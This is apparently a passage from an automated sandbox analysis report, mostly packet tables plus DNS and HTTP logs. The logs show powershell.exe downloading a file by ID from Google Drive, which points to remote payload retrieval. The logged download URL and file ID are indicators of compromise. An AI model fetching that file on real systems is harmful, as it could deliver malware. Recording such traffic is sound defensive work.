                                                                                                  Mar 10, 2025 20:38:41.318948030 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.318958998 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.319003105 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.326208115 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.326303005 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.326324940 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.326374054 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.330854893 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.330940008 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.330951929 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.330988884 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.330998898 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.331063032 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.331258059 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.331310987 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.335130930 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.335191965 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.335199118 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.335232973 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.352355003 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.352425098 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.352440119 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.352472067 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.352483988 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.352509975 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.352516890 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.352560043 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.352566957 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.352617025 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.353559017 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.353614092 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.353621006 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.353657961 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.354290009 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.354345083 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.354351044 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.354389906 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.354465008 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.354510069 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.355983019 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.356039047 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.356045961 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.356081963 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.357549906 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.357600927 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.357609034 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.357649088 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.357656002 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.357697010 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.365114927 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.365191936 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.365253925 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.365298986 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.368124962 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.368177891 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.368213892 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.368254900 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.368263006 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.368299961 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.368596077 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.368644953 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.368758917 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.368803978 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.371949911 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.372008085 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.372015953 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.372052908 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.405433893 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.405524969 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.405536890 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.405575991 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.406049013 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.406102896 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.406111956 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.406151056 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.406707048 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.406773090 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.406779051 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.406819105 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.407778025 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.407820940 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.407825947 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.407856941 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.407876968 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.407917023 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.408493042 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.408540964 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.408545017 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.408580065 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.409439087 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.409487009 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.409491062 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.409524918 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.410468102 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.410511017 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.410515070 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.410550117 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.410556078 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.410590887 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.411559105 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.411603928 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.411607981 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.411643028 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.433049917 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.433124065 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.433196068 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.433202028 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.433234930 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.433257103 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.433693886 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.433744907 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.433772087 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.433808088 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.434719086 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.434793949 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.434803963 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.434855938 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.435621977 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.435672045 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.435682058 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.435715914 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.436547995 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.436585903 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.436589956 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.436625957 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.437637091 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.437679052 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.437684059 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.437721014 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.438385963 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.438431025 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.438435078 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.438473940 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.438477993 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.438518047 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.439368010 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.439405918 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.439429998 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.439467907 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.440284967 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.440327883 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.440337896 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.440377951 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.441240072 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.441302061 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.441308022 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.441353083 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.441361904 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.441391945 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.442301989 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.442349911 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.442364931 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.442401886 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.443202972 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.443250895 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.443701982 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.443742990 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.443758965 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.443792105 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.444700956 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.444750071 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.444757938 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.444789886 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.445611000 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.445657969 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.445663929 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.445694923 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.445708036 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.445748091 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.446665049 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.446710110 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.453716040 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.453788042 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.453794956 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.453830957 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.454510927 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.454555035 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.454559088 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.454598904 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.486134052 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.486206055 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.486238003 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.486296892 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.486308098 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.486316919 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.486355066 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.486699104 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.486749887 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.486753941 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.486792088 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.487540960 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.487631083 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.487637997 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.487673998 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.488476992 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.488529921 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.488534927 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.488565922 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.489414930 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.489459991 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.489464045 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.489494085 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.490888119 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.490936041 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.490941048 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.490973949 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.490978003 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.491013050 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.491466999 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.491509914 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.491570950 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.491614103 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.492583990 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.492641926 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.492646933 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.492712021 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.493213892 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.493264914 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.493271112 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.493303061 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.506779909 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.506884098 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.506892920 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.506944895 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.507126093 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.507175922 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.507179976 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.507230043 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.507970095 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.508019924 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.508023024 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.508085012 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.508090019 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.508126974 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.509064913 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.509124041 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.509128094 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.509176016 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.509902000 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.509948015 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.509952068 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.509995937 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.510797024 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.510845900 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.510849953 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.510894060 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.511720896 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.511774063 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.511786938 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.511790991 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.511822939 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.511866093 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.511897087 CET44349697142.250.186.161192.168.2.10
                                                                                                  Mar 10, 2025 20:38:41.511904001 CET49697443192.168.2.10142.250.186.161
                                                                                                  Mar 10, 2025 20:38:41.511949062 CET49697443192.168.2.10142.250.186.161
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Mar 10, 2025 20:37:30.863452911 CET6515353192.168.2.101.1.1.1
                                                                                                  Mar 10, 2025 20:37:30.871737003 CET53651531.1.1.1192.168.2.10
                                                                                                  Mar 10, 2025 20:37:33.206823111 CET6277353192.168.2.101.1.1.1
                                                                                                  Mar 10, 2025 20:37:33.213743925 CET53627731.1.1.1192.168.2.10
                                                                                                  Mar 10, 2025 20:37:36.054622889 CET5899953192.168.2.101.1.1.1
                                                                                                  Mar 10, 2025 20:37:36.062622070 CET53589991.1.1.1192.168.2.10
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Mar 10, 2025 20:37:30.863452911 CET192.168.2.101.1.1.10xe99Standard query (0)Host_6637.6637.6637.657eA (IP address)IN (0x0001)false
                                                                                                  Mar 10, 2025 20:37:33.206823111 CET192.168.2.101.1.1.10x9ecStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                  Mar 10, 2025 20:37:36.054622889 CET192.168.2.101.1.1.10x4813Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Mar 10, 2025 20:37:30.871737003 CET1.1.1.1192.168.2.100xe99Name error (3)Host_6637.6637.6637.657enonenoneA (IP address)IN (0x0001)false
                                                                                                  Mar 10, 2025 20:37:33.213743925 CET1.1.1.1192.168.2.100x9ecNo error (0)drive.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                                                  Mar 10, 2025 20:37:36.062622070 CET1.1.1.1192.168.2.100x4813No error (0)drive.usercontent.google.com142.250.186.161A (IP address)IN (0x0001)false
                                                                                                  Mar 10, 2025 20:37:46.919982910 CET1.1.1.1192.168.2.100x3b1fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                  Mar 10, 2025 20:37:46.919982910 CET1.1.1.1192.168.2.100x3b1fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                  • drive.google.com
                                                                                                  • drive.usercontent.google.com
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.1049682142.250.186.1744434504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-03-10 19:37:35 UTC215OUTGET /uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63bwGYe4-0QC HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                                  Host: drive.google.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-03-10 19:37:35 UTC1610INHTTP/1.1 303 See Other
                                                                                                  Content-Type: application/binary
                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                  Date: Mon, 10 Mar 2025 19:37:35 GMT
                                                                                                  Location: https://drive.usercontent.google.com/download?id=1i7dwfRPhv9u6AAd6irYY63bwGYe4-0QC&export=download
                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                  Content-Security-Policy: script-src 'nonce-KtAzfHp6Xg11ZgqdtWO_zA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                  Server: ESF
                                                                                                  Content-Length: 0
                                                                                                  X-XSS-Protection: 0
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                  Connection: close


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.1049685142.250.186.1744434504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-03-10 19:37:42 UTC97OUTGET /uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63bwGYe4-0QC HTTP/1.1
                                                                                                  Host: drive.google.com
                                                                                                  2025-03-10 19:37:43 UTC1319INHTTP/1.1 303 See Other
                                                                                                  Content-Type: application/binary
                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                  Date: Mon, 10 Mar 2025 19:37:42 GMT
                                                                                                  Location: https://drive.usercontent.google.com/download?id=1i7dwfRPhv9u6AAd6irYY63bwGYe4-0QC&export=download
                                                                                                  Strict-Transport-Security: max-age=31536000
